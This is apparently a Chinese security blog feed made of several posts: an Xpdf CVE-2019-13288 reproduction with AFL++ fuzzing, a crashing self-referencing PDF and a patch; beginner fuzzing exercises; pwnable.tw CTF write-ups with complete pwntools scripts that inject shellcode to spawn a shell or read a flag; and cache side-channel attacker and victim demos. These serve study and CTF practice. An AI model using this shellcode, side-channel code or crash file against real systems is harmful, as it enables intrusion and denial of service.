                     exif_format_get_name(EXIF_FORMAT_SRATIONAL),
                     exif_format_get_name(EXIF_FORMAT_RATIONAL));
      break;

也算是在开学前完成了这两个 CVE 的复现，还没懒到啥也不干……

References

[^1]: Description of Exif file format

CVE-2019-13288: Xpdf

Tue, 10 Feb 2026 00:00:00 GMT

import CveCard from "@components/misc/CveCard.astro";

CVE-2019-13288

Description

Compile

Download

这里选择的是 Xpdf Source Code - xpdf 3.02，而不是 4.01.01。

wget https://dl.xpdfreader.com/old/xpdf-3.02.tar.gz
tar -zxvf xpdf-3.02.tar.gz

Build

先用 LTO mode 插下桩：

cd xpdf-3.02
CC=afl-clang-lto CXX=afl-clang-lto++ ./configure --prefix="$PWD/install"
make -j`nproc`
make install

考虑到插桩后的代码影响调试，所以我们再单独编译一个调试用的版本：

CC=clang CXX=clang++ CFLAGS="-O0 -g -gdwarf-4 -fno-inline -fno-builtin -fno-omit-frame-pointer" CXXFLAGS="$CFLAGS" ./configure --prefix="$PWD/install-dbg"
make -j`nproc`
make install

Samples

这里我用脚本自动生成一些最小样本，先创建一个 python 虚拟环境，以免搞乱系统环境：

uv venv .venv
uv pip install reportlab pillow

生成样本的脚本如下，使用 uv run python .venv/gen_corpus.py 运行。

#!/usr/bin/env python3

import os
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import A4
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
from PIL import Image

OUTDIR = "corpus/pdf"
FONT_PATH = "/usr/share/fonts/TTF/Inconsolata-Black.ttf"

os.makedirs(OUTDIR, exist_ok=True)

def path(name):
    return os.path.join(OUTDIR, name)

def gen_image(fname):
    img = Image.new("RGB", (32, 32), color=(255, 0, 0))
    img.save(fname, "JPEG")

def gen_minimal():
    c = canvas.Canvas(path("id_000000_minimal.pdf"))
    c.drawString(10, 10, "hi")
    c.save()

def gen_text():
    c = canvas.Canvas(path("id_000001_text.pdf"))
    for i in range(5):
        c.drawString(50, 800 - i * 20, f"text line {i}")
    c.save()

def gen_multipage():
    c = canvas.Canvas(path("id_000002_multipage.pdf"))
    for i in range(5):
        c.drawString(100, 700, f"page {i}")
        c.showPage()
    c.save()

def gen_image_pdf():
    img_path = path("tmp.jpg")
    gen_image(img_path)

    c = canvas.Canvas(path("id_000003_image.pdf"), pagesize=A4)
    c.drawImage(img_path, 100, 500, width=100, height=100)
    c.save()

    os.remove(img_path)

def gen_font_pdf():
    pdfmetrics.registerFont(TTFont("FuzzFont", FONT_PATH))
    c = canvas.Canvas(path("id_000004_font.pdf"))
    c.setFont("FuzzFont", 12)
    c.drawString(100, 700, "font fuzz test")
    c.save()

def gen_stream_filter():
    # Hand-written PDF: stream + FlateDecode (parser favorite)
    data = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /Contents 4 0 R >>
endobj
4 0 obj
<< /Length 5 /Filter /FlateDecode >>
stream
x\x9c\x03\x00\x00\x00\x00\x01
endstream
endobj
xref
0 5
0000000000 65535 f
0000000010 00000 n
0000000060 00000 n
0000000115 00000 n
0000000175 00000 n
trailer
<< /Root 1 0 R >>
startxref
240
%%EOF
"""
    with open(path("id_000005_stream_filter.pdf"), "wb") as f:
        f.write(data)

def main():
    gen_minimal()
    gen_text()
    gen_multipage()
    gen_image_pdf()
    gen_font_pdf()
    gen_stream_filter()
    print(f"[+] PDF corpus generated in ./{OUTDIR}")

if __name__ == "__main__":
    main()

Fuzzing

有了样本之后就可以用下面这个指令开始跑 fuzz 了：

afl-fuzz -i corpus/ -o out/ -s 1337 -- ./install/bin/pdftotext @@ -

跑呀跑，刚跑两分钟就出了几个 crashes，然后我去吃了个饭，大概十几分钟，回来一看居然已经有 33 个 crashes 了。简单看了下，发现除了下面这个符合描述的 crash 样本外，还爆出来不少因为其它原因崩溃的 corpus 。不过由于我们的目标是复现 CVE-2019-13288 所描述的漏洞，所以这里只会分析这个递归炸栈的 DoS 攻击样本。

Analysis

根据上面的截图，我们不难发现，在执行 Parser::getObj 时反复使用了 objNum=7, objGen=0 作为参数，而 Object::fetch 和 XRef::fetch 的调用虽然早于 Parser::getObj，并且也在后续 backtrace 中重复出现，但从名字来看就知道，它们只是用于转发参数的函数，而不是真正创建 / 重入对象的函数，所以，我们应该从 Parser::getObj 开始分析，暂且认为它是递归环入口。

在 Parser.cc:94 下个断点，我们发现它直接进入了 makeStream，一路 n 下去，最后进入了 addFilters：

所以 addFilters 才是递归环的入口。

Stream *Stream::addFilters(Object *dict) {
  Object obj, obj2;
  Object params, params2;
  Stream *str;
  int i;

  str = this;
  dict->dictLookup("Filter", &obj);
  if (obj.isNull()) {
    obj.free();
    dict->dictLookup("F", &obj);
  }
  dict->dictLookup("DecodeParms", &params);
  if (params.isNull()) {
    params.free();
    dict->dictLookup("DP", &params);
  }
  if (obj.isName()) {
    str = makeFilter(obj.getName(), str, &params);
  } else if (obj.isArray()) {
    for (i = 0; i < obj.arrayGetLength(); ++i) {
      obj.arrayGet(i, &obj2);
      if (params.isArray())
        params.arrayGet(i, &params2);
      else
        params2.initNull();
      if (obj2.isName()) {
        str = makeFilter(obj2.getName(), str, &params2);
      } else {
        error(getPos(), "Bad filter name");
        str = new EOFStream(str);
      }
      obj2.free();
      params2.free();
    }
  } else if (!obj.isNull()) {
    error(getPos(), "Bad 'Filter' attribute in stream");
  }
  obj.free();
  params.free();

  return str;
}

调到 dictLookup("Filter", &obj) 的时候发现，它会去找 (objNum=7, objGen=0) 的 Dictionary 有没有 Filter：

我们的 crash 样本中这个 Indirect Object 长这样：

%PDF-1.3
% ReportLab Generated PDF document (opensource)
1 0 obj
<<
/F1 2 0 R
>>
endobj
2 0 obj
<<
/BaseFont /Helvetica /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font
>>
endobj
3 0 obj
<<
/Contents 7 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 6 0 R /Resources <<
/Font 1 0 R /Pr~cSet [ /PDF /Text /ImageB /ImageC /ImageI ]
>> /Rotate 0 /Trans <<

>>
  /Type /Page
>>
endobj
4 0 obj
<<
/PageMode /UseNone /Pages 6 0 R /Type /Catalog
>>
endobj
5 0 obj
<<
/Author (anonymous) /CreationDate (D:20260210132607+08'00') /Creator (anonymous) /erated PDF doModDate (D:20260210132607+08'00') /Producer (ReportLab PDF Library - \(opensource\))
  /Subject (unspecified) /Title (unti>
endobj
6 0 obj
<<
/Count 1 /Kids [ 3 0 R ] /Type /Pages
>>
endobj
7 0 obj
<<
/Filter [ /ASCII85Decode /FlateDects 7 0 R /Meode ] /Length 87
>>
stream
GapQh0E=F,0U\H3T\pNYT^QKk?tc>IP,;W#U1^23ihPEM_?CW4KISi9!25KZ"c\I79neZ[Kb,ht$3`$^8YHZB~>endstream
endobj
xref
0 8
00 65535 f
000061 00000 n
000092 00000 n
000199 00000 n
000402 00000 n
00 Off00 n
000731 00000 n
000790 00000 n
trailer
<<
/ID
[<a9e650489693d00e7eßßßßßßßßßßßßab1f137a614fa1><a9e650489693d00e7eab1f137a614fa1>]
% ReportLab genKeywords () /cument -- digest (opensource)

/Info 5 0 R
/Root 4 0 R
/Size 8
>>
startxref
966
%%EOF

显然存在 Dictionary，并且里面是有 Filter 的，所以它会拿到这个 Object 的 Filter，得到一个长度为 4 的 Array：

这和我们 crash 样本中的内容完美匹配。

如果对此有疑问的话，可以去看 PDF reference: Adobe portable document format, version 1.3 。之所以看 v1.3 而不是更新的版本，是因为我们的 crash 样本用的 PDF 规格版本就是 1.3，即 %PDF-1.3。

继续往下走，我们会进入 else if (obj.isArray()) 这个分支：

回顾最开始的递归链，我们知道程序是执行完 Object::arrayGet -> Array::get 后反回到 fetch，再次获取 (objNum=7, objGen=0) 导致无限递归的。我们步入这个函数看看当前 for 循环在 i = 0 的时候拿到了什么：

我们发现它确实按照我们预期的那样，获取到了数组索引为 0 的元素，由于类型为 objName，所以之后会进入 if (obj2.isName()) 这个分支，而又因为 Object 内部其实是一个 tagged union，所以 obj2.getName() 获取到的值为 ASCII85Decode。

再次回顾一开始的递归调用链，我们注意到造成 Array::get 后返回到 fetch 再次获取到 (objNum=7, objGen=0) 的索引是 i = 2，直接 b Array::get if i == 2 后跳过去看，确实获取到了 7 0 R：

最后，返回到 Object::fetch 后由于 type == objRef && xref 成立，导致再次 fetch 了 (objNum=7, objGen=0)，如此循环，陷入无限递归，最终耗尽了栈空间，BOOM!

Fix

查询规格文档，我们发现 Filter 的值只能是 Name 或 Name 数组，那就很好解决了。

我们可以直接禁止 Filter 中出现 Indirect Reference，或者检测 Stream 自引用等……出于性能考虑，我选择直接挡 objRef 类型：

Stream *Stream::addFilters(Object *dict) {
  Object obj, obj2;
  Object params, params2;
  Stream *str;
  int i;

  str = this;
  dict->dictLookup("Filter", &obj);
  if (obj.isNull()) {
    obj.free();
    dict->dictLookup("F", &obj);
  }
  dict->dictLookup("DecodeParms", &params);
  if (params.isNull()) {
    params.free();
    dict->dictLookup("DP", &params);
  }
  if (obj.isName()) {
    str = makeFilter(obj.getName(), str, &params);
  } else if (obj.isArray()) {
    for (i = 0; i < obj.arrayGetLength(); ++i) {
      obj.arrayGetNF(i, &obj2);
      if (params.isArray())
        params.arrayGet(i, &params2);
      else
        params2.initNull();
      if (obj2.isRef()) {
        error(getPos(), "Indirect reference is not allowed in Filter");
        str = new EOFStream(str);
        obj2.free();
        params2.free();
        break;
      }
      if (obj2.isName()) {
        str = makeFilter(obj2.getName(), str, &params2);
      } else {
        error(getPos(), "Bad filter name");
        str = new EOFStream(str);
      }
      obj2.free();
      params2.free();
    }
  } else if (!obj.isNull()) {
    error(getPos(), "Bad 'Filter' attribute in stream");
  }
  obj.free();
  params.free();

  return str;
}

可以看到，我们成功将无限递归扼杀在了摇篮里 xD

The Fuzzy Notebook

Sat, 07 Feb 2026 00:00:00 GMT

Prologue

次日，群名从 Pwn Squad 变成了 Lost Squad。

我们不知道这是否是更好的选择，但我想，我们绝不差尝试的勇气。

:::note 由于是直接上手用 fuzzer，边做边学，所以肯定会漏掉很多重要的概念，算是比较冒险的学习方法了。不过没事，后面慢慢总结。 :::

Concept

以下概念翻译自 Frequently asked questions (FAQ)。

程序包含 函数 (Function)，而函数包含编译后的机器码。
函数中的机器码可以由一个或多个 基本块 (Basic Block) 组成。
基本块是尽可能长的连续机器指令序列，它只有一个 入口点 (Entry Point)（可被多个其它基本块进入），且在执行过程中线性运行，除了末尾外，不会发生分支或跳转到其它地址。

下面的 A、B、C、D、E 都是基本块：

function() {
  A:
    some
    code
  B:
    if (x) goto C; else goto D;
  C:
    some code
    goto E
  D:
    some code
    goto B
  E:
    return
}

边 (Edge) 则表示两个直接相连的基本块之间的唯一关系，自环也算一条边：

              Block A
                |
                v
              Block B  <------+
            /        \       |
            v          v      |
        Block C    Block D --+
            \
              v
              Block E

Demo

以下面这个程序为例，感受一下 Fuzz 的基本用法及其思想。

#include <stdio.h>
#include <stdlib.h>

int isBigPrime(int n) {
  if (n <= 5)
    return 0;
  for (int i = 2; i * i <= n; i++)
    if (n % i == 0)
      return 0;
  return 1;
}

int main(void) {
  char s[35];
  scanf("%s", s);

  char cnt[300] = {0};

  for (int i = 0; s[i]; i++) {
    cnt[s[i]]++;
    if (s[i] < 'x' || s[i] > 'z') {
      puts("unacceptable");
      return 0;
    }
  }

  if (isBigPrime(cnt['x']) && isBigPrime(cnt['y']) && isBigPrime(cnt['z']))
    abort();

  puts("Nice string");

  return 0;
}

程序逻辑为：

输入限制：程序只接受由字符 x，y，z 组成的字符串。如果包含其他字符，程序会输出 unacceptable 并正常退出
计数统计：使用 cnt 数组统计输入字符串中 x，y，z 各自出现的次数
触发崩溃：
- isBigPrime 函数检查一个数是否为大于 5 的质数 (e.g. 7, 11, 13, 17 etc.)
- 只有当 x、y 以及 z 的数量同时都是大于 5 的质数时，程序才会执行 abort
额外 Bug：
- scanf 没有限制输入长度，存在栈溢出

根据 Selecting the best AFL++ compiler for instrumenting the target 的指引，我们选择 afl-clang-lto 作为 插桩 (Instrumentation) 用的编译器。

使用如下指令编译并插桩：

afl-clang-lto ./test.c -o test

接下来，只要提供一些初始样本，放入 inputs 文件夹，比如我提供了这些样本：

λ ~/Projects/Fuzz/ cat inputs/text/*
aaaabaaacaaadaaaeaaa
helloworld
Hello world!
ahfoer

它们本身没有一个会让程序崩溃，我们希望 AFL++ 能自己变异这些样本，寻找到每一个能让程序崩溃的输入。

由于 Arch 默认配置的问题，我需要临时关闭一些选项以确保 fuzzer 高效运行，为了方便，我直接使用如下指令自动修改系统配置（虽然这可能会造成一些安全隐患）：

sudo afl-system-config

然后就可以使用以下指令来探索程序了：

afl-fuzz -i inputs -o out/ -- ./test

刚跑几秒就出了 6 个 crash，但是全都是栈溢出，之后大概在 1min 左右，把 abort 的 crash 路径也找到了，可以看到是第九个样本：

可以在 out/default/crashes 中找到这 10 个可以触发崩溃的输入。

check 脚本如下：

#!/usr/bin/env bash

for f in out/default/crashes/id:*; do
  echo "==== $f ===="
  # hexdump -C "$f" | head
  ./test <"$f"
done

Fuzzing-Module

Fuzzing-Module 是 AFL++ 官方推荐的纯新手练习。一共 3 个 exercises，speedrun 一下。

Exercise 1

程序源码如下：

#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

using namespace std;

int main() {

  string str;

  cout << "enter input string: ";
  getline(cin, str);
  cout << str << endl << str[0] << endl;

  if (str[0] == 0 || str[str.length() - 1] == 0) {
    abort();
  } else {
    int count = 0;
    char prev_num = 'x';
    while (count != str.length() - 1) {
      char c = str[count];
      if (c >= 48 && c <= 57) {
        if (c == prev_num + 1) {
          abort();
        }
        prev_num = c;
      }
      count++;
    }
  }

  return 0;
}

使用 CC=afl-clang-lto CXX=afl-clang-lto++ cmake -S . -B build 生成编译配置，然后通过 cmake --build build 编译项目。

简单分析一下几个可以造成 crash 的地方，然后跑一下 fuzz 看看能不能对上：

str[0] == \x00
str[str.length() -1] == \x00
下一个读取到的数字比上一个读取到的数字大一
\n，EOF

根据 Exercise 1 的要求，我们使用如下脚本生成 5 个 seeds：

#!/usr/bin/env bash

mkdir seeds
for i in {0..4}; do
  dd if=/dev/urandom of=seeds/seed_"$i" bs=64 count=10
done

然后跑 afl-fuzz -i seeds -o out/ -m 0 -- ./build/simple_crash，刚跑一秒就把三个 crash 都找到了：

可以看到第一个对上了 Case 2，第二个对上了 Case 1，第三个对上了 Case 3。

:::important 第四个 Case 找不到，那时因为当触发的 crash 是由 Undefined Behaviour 导致时，AFL++ 会认为它比较 flaky，自动把它剔除掉。因为 UB 一类的，可能在不同编译 / 优化 / 运行中表现各不相同，从而不能产生一种稳定可复现的 crash 。

既然如此，我们只要增强它的 crash 表现，使其更加可确定即可，比如：

if (str.length() == 0)
  abort();

亦或者，我们打开 Sanitizer，这样就可以将语言层面的未定义行为变成 fuzzer 能稳定识别的崩溃信号了。

#!/usr/bin/env bash

cmake -S . -B build \
  -DCMAKE_C_COMPILER=afl-clang-lto \
  -DCMAKE_CXX_COMPILER=afl-clang-lto++ \
  -DCMAKE_C_FLAGS="-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined" \
  -DCMAKE_CXX_FLAGS="-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined"

通过上面的指令生成编译配置，开启 AddressSanitizer (ASan) 和 UndefinedBehaviorSanitizer (UBSan)，然后跑 fuzz 前设置一下这两个环境变量：

export ASAN_OPTIONS=abort_on_error=1:symbolize=0:detect_leaks=0
export UBSAN_OPTIONS=abort_on_error=1

debug 时使用：

export ASAN_OPTIONS=abort_on_error=1:symbolize=1:detect_leaks=0
export UBSAN_OPTIONS=abort_on_error=1:print_stacktrace=1

:::

Exercise 2

没啥崩溃点，只有这一个 abort, 输入 ffl 即可触发。

} else if (input[i] == 'l') {
    if (crew.num == 0) {
        abort();
    }
    land();
}

我使用的 input 是随机生成的 200 字节长 De Bruijn Sequence，实际上沿用 Exercise 1 的 seeds 应该也可以。

观察跑出来的几个 crashes, 发现全都符合 ffl 的行为，多的 f 被 h 抵消。

Exercise 3

代码太多就不放了，简单罗列一下 abort points:

choose_color: 输入纯数字
min_alt: 输入小于 0
min_airspeed: 输入小于 0
fuel_cap: 输入小于 0
check_alt: 传入 alt 小于 0
check_fuel: 传入 fuel 小于 0
check_speed: 传入 speed 小于 0

这里的话，我遵循提示，在 cmake 创建配置文件的时候多加了一个 -DCMAKE_EXPORT_COMPILE_COMMANDS=1 参数，用于生成编译命令到 compile_commands.json，并尝试使用 Sourcetrail 来阅读源码。但是发现用这个工具还不如我直接在 nvim 里面看代码来得快……或许以后分析很大的项目时可以再试试。

这节练习给了这么一个 template：

/*
 * This file isolates the Specs class and tests out the
 * choose_color function specifically.
 */

#include "specs.h"

int main(int argc, char **argv) {
  // In order to call any functions in the Specs class, a Specs
  // object is necessary. This is using one of the constructors
  // found in the Specs class.
  Specs spec(505, 110, 50);
// By looking at all the code in our project, this is all the
// necessary setup required. Most projects will have much more
// that is needed to be done in order to properly setup objects.

// This section should be in your code that you write after all the
// necessary setup is done. It allows AFL++ to start from here in
// your main() to save time and just throw new input at the target.
#ifdef __AFL_HAVE_MANUAL_CONTROL
  __AFL_INIT();
#endif

  spec.choose_color();
  // spec.min_alt();

  return 0;
}

我们可以通过定义 __AFL_HAVE_MANUAL_CONTROL 来设置 fuzz 入口。

先测试 choose_color，如果输入纯数字就会崩：

但这里多了一个 \x20，即空格导致的崩溃，是我没想到的，研究研究。

std::cin >> color;
if (isNumber(color))
  abort();

bool Specs::isNumber(std::string str) {
  for (int i = 0; i < str.length(); i++) {
    if (isdigit(str[i]) == 0)
      return false;
  }
  return true;
}

choose_color 是用 cin >> 读取的输入，由于 >> 的逻辑是先跳过所有 spaces，然后从第一个非空字符读取到下一个 space 停止，所以输入 \x20 的话，什么都不会读到，导致 color = ""，for 循环根本不会进入，返回 true 导致崩溃。

其它的没啥好说的，但是在 slice fuzz min_airspeed 的时候发现 exec speed: 55.54/sec，简直是在拿显微镜扫地 o_O

究其原因的话，可能是因为 fuzzer 计算 exec 是按处理完一整轮来算的，可是现在这个情况内部有一个循环，可能触发多次输入，所以如果输入样本很大的话，就会处理很久。

void Specs::min_airspeed() {
  bool out_of_bounds = true;
  std::cout << "enter aircraft minimum airspeed: ";
  std::cin >> speed;
  do {
    out_of_bounds = false;
    if (speed < 0)
      abort();
    if (speed < 100) {
      std::cout << "too low. please re-enter: ";
      std::cin >> speed;
      out_of_bounds = true;
    } else if (speed > 200) {
      std::cout << "too high. please re-enter: ";
      std::cin >> speed;
      out_of_bounds = true;
    }
  } while (out_of_bounds);
}

这里发现第二个 crash 有点奇怪：

这是因为 >> 在读取数字的时候也有特殊的规则，它会自动拆分数字。即 1-3113\x09 被拆分为 1 和 -3113 两部分，被拆开的那部分会留在输入缓冲区等待下一次读取的时候发出去，所以这里触发的逻辑是先判断 speed < 100 重新读取，然后发送负数触发 abort 。

最后还剩下三个 check 函数我没测，因为它们相对前面几个来说更吃运气一点，感觉有点浪费时间，就且先跳过了。

Fuzzing101

下面是我做过的 Fuzzing101 Exercises 导航列表：

Write-ups: Pwnable.tw

Fri, 06 Feb 2026 00:00:00 GMT

Start

Information

Category: Pwn

Description

Don't know how to start?<br /> Check GEF 101 - Solving pwnable.tw/start by @_hugsy

Write-up

熟悉又陌生？没错你被骗了。

保护全关，泄漏栈地址打 shellcode 。

_start
_start      ; Segment type: Pure code
_start      ; Segment permissions: Read/Execute
_start      _text segment para public 'CODE' use32
_start      assume cs:_text
_start      ;org 8048060h
_start      assume es:nothing, ss:nothing, ds:LOAD, fs:nothing, gs:nothing
_start
_start
_start
_start      ; int start()
_start      public _start
_start      _start proc near
_start      push    esp
_start+1    push    offset _exit
_start+6    xor     eax, eax
_start+8    xor     ebx, ebx
_start+A    xor     ecx, ecx
_start+C    xor     edx, edx
_start+E    push    3A465443h
_start+13   push    20656874h
_start+18   push    20747261h
_start+1D   push    74732073h
_start+22   push    2774654Ch
_start+27   mov     ecx, esp        ; addr
_start+29   mov     dl, 14h         ; len
_start+2B   mov     bl, 1           ; fd
_start+2D   mov     al, 4
_start+2F   int     80h             ; LINUX - sys_write
_start+31   xor     ebx, ebx
_start+33   mov     dl, 3Ch ; '<'
_start+35   mov     al, 3
_start+37   int     80h             ; LINUX -
_start+39   add     esp, 14h
_start+3C   retn
_start+3C   _start endp ; sp-analysis failed
_start+3C
_exit
_exit
_exit      ; Attributes: noreturn
_exit
_exit      ; void exit(int status)
_exit      _exit proc near
_exit
_exit      status= dword ptr  4
_exit
_exit      pop     esp
_exit+1    xor     eax, eax
_exit+3    inc     eax
_exit+4    int     80h             ; LINUX - sys_exit
_exit+4    _exit endp ; sp-analysis failed
_exit+4
_exit+4    _text ends
_exit+4
_exit+4
_exit+4    end _start

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    asm,
    context,
    flat,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./start"
HOST, PORT = "chall.pwnable.tw", 10000

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=False)


def main():
    launch()

    target.recvuntil(b"Let's start the CTF:")
    raw_input("DEBUG")
    payload = flat(
        {
            0: b"/bin/sh\x00",
            0x14: elf.sym["_start"] + 39,
        },
        filler=b"\x41",
    )
    target.send(payload)

    stack = int.from_bytes(target.recv(4), "little")
    binsh = stack - 0x1C
    target.success(f"stack: {hex(stack)}")
    target.success(f"binsh: {hex(binsh)}")

    payload = flat(
        {
            0: asm(
                f"""
                mov ebx, {binsh}
                mov eax, 0xb
                xor ecx, ecx
                xor edx, edx
                int 0x80
                """
            ),
            0x14: stack - 0x4,
        },
        filler=b"\x00",
    )
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

orw

Information

Category: Pwn

Description

Read the flag from /home/orw/flag.<br /> Only open read write syscall are allowed to use.

Write-up

上古时代。你怀念吗？我不……

分享点好东西：https://gist.github.com/CuB3y0nd/09f6e4c3db728b9d2f4714da1cac3ca0

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    asm,
    context,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./orw"
HOST, PORT = "chall.pwnable.tw", 10001

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=False)


def main():
    launch()

    payload = asm("""
        mov ebx, 0x804a094
        mov ecx, 0
        mov eax, 0x5
        int 0x80

        mov ebx, eax
        mov ecx, esp
        mov edx, 0x1337
        mov eax, 0x3
        int 0x80

        mov ebx, 0x1
        mov ecx, esp
        mov edx, 0x1337
        mov eax, 0x4
        int 0x80
    flag:
        .ascii "/home/orw/flag\\x00"
    """)
    raw_input("DEBUG")
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Write-ups: System Security (Microarchitecture Exploitation) series

Fri, 30 Jan 2026 00:00:00 GMT

import GithubCard from "@components/misc/GithubCard.astro";

Examples

下面给出一些我在学习过程中写的 demo，就不详细说明作用了，只贴一下代码（怕自己弄丢了

用到的 axium 是我自己写的内核 / 侧信道框架，点点 star 支持一下谢谢 :P

对于侧信道，还提供了缓存噪声分析的 dashboard xD

每个 chart 都可以单独导出为 PNG，方便嵌入到文档中之类的……

当然，TUI 的可视化 report 也是必不可少的：

探测当前程序内内存映射有没有进缓存

#include <axium/axium.h>

#define ARRAY_SIZE 32
#define PAGE_SIZE 0x1000
#define TOTAL_SIZE (ARRAY_SIZE * PAGE_SIZE)

int main(int argc, char *argv[]) {
  set_log_level(DEBUG);
  if (argc < 2) {
    log_info("Usage: %s <IDX>", argv[0]);
    return 1;
  }

  int target_idx = atoi(argv[1]);
  if (target_idx < 0 || target_idx >= ARRAY_SIZE) {
    log_error("Index must be between 0 and %d", ARRAY_SIZE - 1);
  }

  uint8_t *target = mmap(NULL, TOTAL_SIZE, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
  if (target == MAP_FAILED) {
    log_exception("mmap");
  }

  uint64_t threshold = cache_calibrate_threshold(target);
  log_info("Calibrated threshold (context-aware): %lu cycles", threshold);

  cache_flush_range(target, TOTAL_SIZE);

  maccess(&target[target_idx * PAGE_SIZE]);
  uint64_t results[ARRAY_SIZE];
  for (size_t i = 0; i < ARRAY_SIZE; i++) {
    size_t mixed_idx = MIXED_IDX(i, ARRAY_SIZE - 1);

    uint64_t start = probe_start();
    maccess(&target[mixed_idx * PAGE_SIZE]);
    uint64_t end = probe_end();

    results[mixed_idx] = end - start;
  }

  cache_report_t report;
  cache_analyze(&report, results, ARRAY_SIZE, threshold);
  cache_report(&report);

  if (cache_export_report(&report, "report.json") == 0) {
    cache_view_report("report.json");
  } else {
    log_error("Report export failed!");
  }

  munmap(target, TOTAL_SIZE);
  return 0;
}

探测其它程序内内存映射有没有进缓存

先跑 multiprocess-attacker 再跑 victim 访问内存，效果如下：

#include <axium/axium.h>

#define ARRAY_SIZE 32
#define PAGE_SIZE 0x1000
#define TOTAL_SIZE (ARRAY_SIZE * PAGE_SIZE)

int main(int argc, char *argv[]) {
  set_log_level(DEBUG);
  if (argc < 3) {
    log_info("Usage: %s <IDX> <CPU CORE>", argv[0]);
    return -1;
  }

  int target_idx = atoi(argv[1]);
  if (target_idx < 0 || target_idx >= ARRAY_SIZE)
    log_error("Index must be between 0 and %d", ARRAY_SIZE - 1);

  long nprocs = sysconf(_SC_NPROCESSORS_ONLN);
  int chosen_cpu_core = atoi(argv[2]);
  if (chosen_cpu_core < 0 || chosen_cpu_core >= nprocs)
    log_error("CPU Core number must be between 0 and %ld", nprocs - 1);
  set_cpu_affinity(chosen_cpu_core);

  int fd = shm_open("/test", O_CREAT | O_RDWR, 0666);
  ftruncate(fd, TOTAL_SIZE);

  char *target =
      mmap(NULL, TOTAL_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

  log_info("Victim performing a single access to Index %d...", target_idx);
  maccess(&target[target_idx * PAGE_SIZE]);

  return 0;
}

#include <axium/axium.h>

#define ARRAY_SIZE 32
#define PAGE_SIZE 0x1000
#define TOTAL_SIZE (ARRAY_SIZE * PAGE_SIZE)

int main(int argc, char *argv[]) {
  set_log_level(DEBUG);
  if (argc < 2) {
    log_info("Usage: %s <CPU CORE>", argv[0]);
    return -1;
  }

  long nprocs = sysconf(_SC_NPROCESSORS_ONLN);
  int chosen_cpu_core = atoi(argv[1]);
  if (chosen_cpu_core < 0 || chosen_cpu_core >= nprocs)
    log_error("CPU Core number must be between 0 and %ld", nprocs - 1);
  set_cpu_affinity(chosen_cpu_core);

  shm_unlink("/test");
  int fd = shm_open("/test", O_CREAT | O_RDWR, 0666);
  ftruncate(fd, TOTAL_SIZE);

  char *target =
      mmap(NULL, TOTAL_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

  uint64_t threshold = cache_calibrate_threshold(target);
  log_info("Calibrated threshold (context-aware): %lu cycles", threshold);

  if (cache_audit(target, threshold) != 0)
    log_warning("Audit FAILED: clflush seems ineffective.");

  cache_watch_report_t report;
  uint64_t hits[ARRAY_SIZE] = {0};
  cache_watch_report_init(&report, hits, ARRAY_SIZE, threshold);

  cache_watch_config config =
      cache_watch_config_init(threshold, ARRAY_SIZE, PAGE_SIZE, 100);

  cache_watch_install_handler(&report, "report.json");
  cache_watch(target, &config, NULL, &report);

  return 0;
}

Shared Memory 1.0

Information

Category: Pwn

Description

Get started with interacting with processes via shared memory.

Write-up

